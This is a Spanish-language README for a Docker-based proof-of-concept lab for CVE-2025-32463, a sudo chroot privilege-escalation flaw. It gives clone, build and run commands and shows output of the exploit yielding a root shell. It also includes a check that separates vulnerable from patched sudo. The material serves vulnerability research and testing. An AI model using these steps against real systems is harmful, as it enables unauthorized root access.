
Reimplementación en C del PoC de chwoot
Este repositorio proporciona un entorno mínimo y reproducible para demostrar la falla de escalada de privilegios CVE‑2025‑32463 en la función chroot de sudo.
Las compilaciones vulnerables de sudo 1.9.14 hasta 1.9.17 (todas las revisiones p) en la mayoría de las distribuciones de Linux se ven afectadas.
Páginas de seguridad
| Archivo | Propósito |
|---|---|
| Dockerfile | Crea una imagen de Ubuntu 24.04 con sudo 1.9.16p2 vulnerable y herramientas de compilación |
| sudo‑chwoot.sh | Exploit de prueba de concepto que abre una shell root dentro del chroot |
# Vulnerable sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "vpr-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh pasa --privileged y --rm a Docker para que el contenedor se limpie solo al salir.
Elimina la imagen cuando hayas terminado:
docker rmi vpr-chwoot
| run.sh |
| Script auxiliar que crea la imagen (si es necesario) e inicia el contenedor del exploit |